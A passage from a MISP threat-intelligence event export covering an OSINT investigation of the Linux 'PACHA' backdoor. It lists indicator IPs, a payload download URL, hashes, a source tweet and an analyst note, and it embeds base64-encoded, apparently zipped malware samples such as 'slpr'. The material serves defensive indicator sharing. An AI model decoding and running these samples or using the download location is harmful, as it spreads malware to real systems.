JD0KdMkObKHZARyVGBPXLKZ+SPs8GD7gwBlgBzM934UxRJH28jLYPfW3vkssVh7YICmPYZFGHB9GQiOSzX+ukKMw6oSDcUS7U/Tg302gSYswCbHcRRT2EmPn04OQ17jPRN5xykUisdjo/FeQsJ/j/4L/nHiU+q02YFgUcxLw3sJMM+fJCXYJ0jZJWTc4K7A3g9BB3TilkJruyFtiiUuyBdn0o2MNl/ZPXeklRF90mPt3jusQjBObyXv0elDx6+DLRoDl6Wk7mOKArApmwL4oEhwi0I5iNbrQuAUuqtoHNfgr8U9mAIYKWoug9/VpIRsHyl71KBvyfivW2rs6zHj7qXNfkd+daLSPoCgbLl/zZfc/NS4Pc5JVlsd6nkT1QbxO/rN1KZC2420B63Pk4TyU6cB7BG35pIbNiAspkKuv+XKCCveINiqDRYecMxuyjyoz8FX5LCfyE1hAwuR0thnzER8YJjoeOE0jRXXqIIKvJBLzotCSIUpo7i6bJZDcJxUqtTXfs28+gWR3X2KK10EkGP8MZfFI/crjjL3f4Tjw17nzbjzA3NtryQidCIi3Ck6tzffBy2hhuKKzroMdOPJR/jIPdD4yvno4F3ReTMTePUBeyyzN5Cxphe8DhXhbPjIBO7xc9X4aa2GscP912C+jtJBLoXvoWFZwMytFJ85esraRzln2jHTB3IZFP4dEt3otGVpJrpqaX3gT//afnrqmS/aXGMJFeTNTEvHlTqIINUqT6PtOTtqwyIXfOlgCFctJgFI9PjV1WPGf+4nTPIl0PVuYiC+/lQwt1RmI568gjZQ6W6DRVUGmnxs47gtlIWvuZYHrah6Jhw7aeNhv0QQEIdHepFpyEu2XGwZ1fvage4wvG/QRoSdV2y0II+THaLXDk9wQmMrSftftRZhTLs4jHjXsy7TFDhGf+HLsItf5f7woGQ9+RT2jMd9FleuHx6QDY3q4FnaNBMem6SNPFRCipjTFXp/C8uLVfGBe9wuH8F9LLgd/nPlbl33+ukJYP6USSqgXKF4+zEytzPxnT9kZ1DZdxG8sQZuHk9myGtmqgeWOm2DRpjQ9y/32+PrDm/oKiHhW9hLPvOw++w7DYE4V9eAs9wXw6qrfxLihhZj9eK+ai9mYH8kjbqc3QFuLKE9NMS+V+H7sCX6K1aLknGPvOEJxhZ2ffs8SUWyJMeAahjBH5mY+fpBk5zIA7XPGGWmrty9xieFBgGb5e3fOvabxDe9EEfrbpYiKBFgnrzsAMOao6c1NDto4yU5wwS5VmplIAYcYD76UjcVpfjZePPrb7RRsS8b5XC3rh9L1Rg
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "malware-sample",
|
||
|
"timestamp": "1559379704",
|
||
|
"to_ids": true,
|
||
|
"type": "malware-sample",
|
||
|
"uuid": "5cf23ef8-dbdc-45cb-8ca1-450e950d210f",
|
||
|
"value": "3d02bbddc185352ddc1dea20f54e2f2b39f180a9bd26d8453b5ad7b983466c95|9ae7dc5ff13526e8cc5b8c236066a828"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "filename",
|
||
|
"timestamp": "1559379704",
|
||
|
"to_ids": false,
|
||
|
"type": "filename",
|
||
|
"uuid": "5cf23ef8-9804-476f-afd2-4eaf950d210f",
|
||
|
"value": "3d02bbddc185352ddc1dea20f54e2f2b39f180a9bd26d8453b5ad7b983466c95"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "md5",
|
||
|
"timestamp": "1559379704",
|
||
|
"to_ids": true,
|
||
|
"type": "md5",
|
||
|
"uuid": "5cf23ef8-0318-46ce-9019-4854950d210f",
|
||
|
"value": "9ae7dc5ff13526e8cc5b8c236066a828"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha1",
|
||
|
"timestamp": "1559379704",
|
||
|
"to_ids": true,
|
||
|
"type": "sha1",
|
||
|
"uuid": "5cf23ef8-d628-4196-93e4-4608950d210f",
|
||
|
"value": "69af27d553292952e4d93338c44b0f4e66a15470"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha256",
|
||
|
"timestamp": "1559379704",
|
||
|
"to_ids": true,
|
||
|
"type": "sha256",
|
||
|
"uuid": "5cf23ef8-f698-463d-b69e-4d4e950d210f",
|
||
|
"value": "3d02bbddc185352ddc1dea20f54e2f2b39f180a9bd26d8453b5ad7b983466c95"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "size-in-bytes",
|
||
|
"timestamp": "1559379704",
|
||
|
"to_ids": false,
|
||
|
"type": "size-in-bytes",
|
||
|
"uuid": "5cf23ef8-708c-40b8-949d-4873950d210f",
|
||
|
"value": "58088"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "Most probably compromised host",
|
||
|
"deleted": false,
|
||
|
"description": "An IP address (or domain or hostname) and a port seen as a tuple (or as a triple) in a specific time frame.",
|
||
|
"meta-category": "network",
|
||
|
"name": "ip-port",
|
||
|
"template_uuid": "9f8cea74-16fe-4968-a2b4-026676949ac6",
|
||
|
"template_version": "8",
|
||
|
"timestamp": "1559379945",
|
||
|
"uuid": "5cf23fe9-25c8-47df-a38a-4325950d210f",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "ip",
|
||
|
"timestamp": "1559379945",
|
||
|
"to_ids": true,
|
||
|
"type": "ip-dst",
|
||
|
"uuid": "5cf23fe9-6a38-49ca-8933-4325950d210f",
|
||
|
"value": "45.77.54.157"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "File object describing a file with meta-information",
|
||
|
"meta-category": "file",
|
||
|
"name": "file",
|
||
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
||
|
"template_version": "17",
|
||
|
"timestamp": "1559380191",
|
||
|
"uuid": "5cf24083-6de0-42e3-9ae7-4129950d210f",
|
||
|
"ObjectReference": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cf24083-6de0-42e3-9ae7-4129950d210f",
|
||
|
"referenced_uuid": "5cf240b4-352c-40a3-8aba-40b5950d210f",
|
||
|
"relationship_type": "downloaded-from",
|
||
|
"timestamp": "1559380191",
|
||
|
"uuid": "5cf240df-62b0-4730-b555-443b950d210f"
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"data": "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
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "malware-sample",
|
||
|
"timestamp": "1559380099",
|
||
|
"to_ids": true,
|
||
|
"type": "malware-sample",
|
||
|
"uuid": "5cf24083-e570-445a-b777-4dab950d210f",
|
||
|
"value": "slpr|f049ae13406fdebadb10960bc0deee87"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "filename",
|
||
|
"timestamp": "1559380099",
|
||
|
"to_ids": false,
|
||
|
"type": "filename",
|
||
|
"uuid": "5cf24083-902c-49e9-aa0c-4718950d210f",
|
||
|
"value": "slpr"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "md5",
|
||
|
"timestamp": "1559380099",
|
||
|
"to_ids": true,
|
||
|
"type": "md5",
|
||
|
"uuid": "5cf24083-6a48-4363-b324-4451950d210f",
|
||
|
"value": "f049ae13406fdebadb10960bc0deee87"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha1",
|
||
|
"timestamp": "1559380099",
|
||
|
"to_ids": true,
|
||
|
"type": "sha1",
|
||
|
"uuid": "5cf24083-c6c0-4d5c-9316-434c950d210f",
|
||
|
"value": "da05b42311606eaa03ca8edd6a94ff2eacd44c2b"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha256",
|
||
|
"timestamp": "1559380099",
|
||
|
"to_ids": true,
|
||
|
"type": "sha256",
|
||
|
"uuid": "5cf24083-2c2c-4d3d-8ed5-4c5e950d210f",
|
||
|
"value": "62ca3fd070d6447e844c76e4bedcce908a18bc275c1a713415d11838b1cb5f04"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "size-in-bytes",
|
||
|
"timestamp": "1559380099",
|
||
|
"to_ids": false,
|
||
|
"type": "size-in-bytes",
|
||
|
"uuid": "5cf24083-8908-4603-a951-4f6f950d210f",
|
||
|
"value": "88728"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "url object describes an url along with its normalized field (like extracted using faup parsing library) and its metadata.",
|
||
|
"meta-category": "network",
|
||
|
"name": "url",
|
||
|
"template_uuid": "60efb77b-40b5-4c46-871b-ed1ed999fce5",
|
||
|
"template_version": "7",
|
||
|
"timestamp": "1559380148",
|
||
|
"uuid": "5cf240b4-352c-40a3-8aba-40b5950d210f",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "url",
|
||
|
"timestamp": "1559380148",
|
||
|
"to_ids": true,
|
||
|
"type": "url",
|
||
|
"uuid": "5cf240b4-fd50-484e-ab61-4e7a950d210f",
|
||
|
"value": "37.228.129.58/home/slpr"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "scheme",
|
||
|
"timestamp": "1559380148",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf240b4-261c-4b77-8364-4a0d950d210f",
|
||
|
"value": "http"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "resource_path",
|
||
|
"timestamp": "1559380148",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf240b4-15a4-4db3-b0dc-4954950d210f",
|
||
|
"value": "/home/slpr"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "Microblog post like a Twitter tweet or a post on a Facebook wall.",
|
||
|
"meta-category": "misc",
|
||
|
"name": "microblog",
|
||
|
"template_uuid": "8ec8c911-ddbe-4f5b-895b-fbff70c42a60",
|
||
|
"template_version": "6",
|
||
|
"timestamp": "1559380680",
|
||
|
"uuid": "5cf241f4-75b0-43e7-80fe-4487950d210f",
|
||
|
"ObjectReference": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cf241f4-75b0-43e7-80fe-4487950d210f",
|
||
|
"referenced_uuid": "5cf2421b-bba0-4844-8d28-43c9950d210f",
|
||
|
"relationship_type": "abuses",
|
||
|
"timestamp": "1559380680",
|
||
|
"uuid": "5cf242c8-6570-4a76-95d9-4afd950d210f"
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "post",
|
||
|
"timestamp": "1559380468",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf241f4-6b14-49eb-a550-4c70950d210f",
|
||
|
"value": "latest iptables commands found in new linux #PACHA backdoor sample, MD5=a4ef2477af0c769bb2043bca6b5843c2, the ACCEPTED IP should all be blacklisted."
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "type",
|
||
|
"timestamp": "1559380468",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf241f4-0f14-491e-b20a-40fa950d210f",
|
||
|
"value": "Twitter"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "url",
|
||
|
"timestamp": "1559380468",
|
||
|
"to_ids": true,
|
||
|
"type": "url",
|
||
|
"uuid": "5cf241f4-ce4c-45d4-b3f5-465a950d210f",
|
||
|
"value": "https://twitter.com/liuya0904/status/1134660970112999425"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "username",
|
||
|
"timestamp": "1559380468",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf241f4-51f8-4638-bd9d-4623950d210f",
|
||
|
"value": "liuya0904"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "state",
|
||
|
"timestamp": "1559380468",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf241f4-54ac-4527-ae4e-45b3950d210f",
|
||
|
"value": "Informative"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "An annotation object allowing analysts to add annotations, comments, executive summary to a MISP event, objects or attributes.",
|
||
|
"meta-category": "misc",
|
||
|
"name": "annotation",
|
||
|
"template_uuid": "5d8dc046-15a1-4ca3-a09f-ed4ede7c4487",
|
||
|
"template_version": "2",
|
||
|
"timestamp": "1559381028",
|
||
|
"uuid": "5cf24424-33b4-488b-8202-4db5950d210f",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "format",
|
||
|
"timestamp": "1559381028",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf24424-8ee8-46e5-93a9-4a45950d210f",
|
||
|
"value": "markdown"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "type",
|
||
|
"timestamp": "1559381028",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf24424-1584-4e9c-9fea-45e7950d210f",
|
||
|
"value": "Annotation"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "text",
|
||
|
"timestamp": "1559381028",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf24424-c33c-4187-8f6d-4907950d210f",
|
||
|
"value": "OSINT investigation based on the original tweet from Liu Ya which contains a netfilter/iptables script with some IP addresses. By pivoting from the IP addresses, malware samples and script can be found at different locations. This quick analysis include the scripts collected, the samples and the relationships between the various objects."
|
||
|
}
|
||
|
]
|
||
|
}
|
||
|
]
|
||
|
}
|
||
|
}
|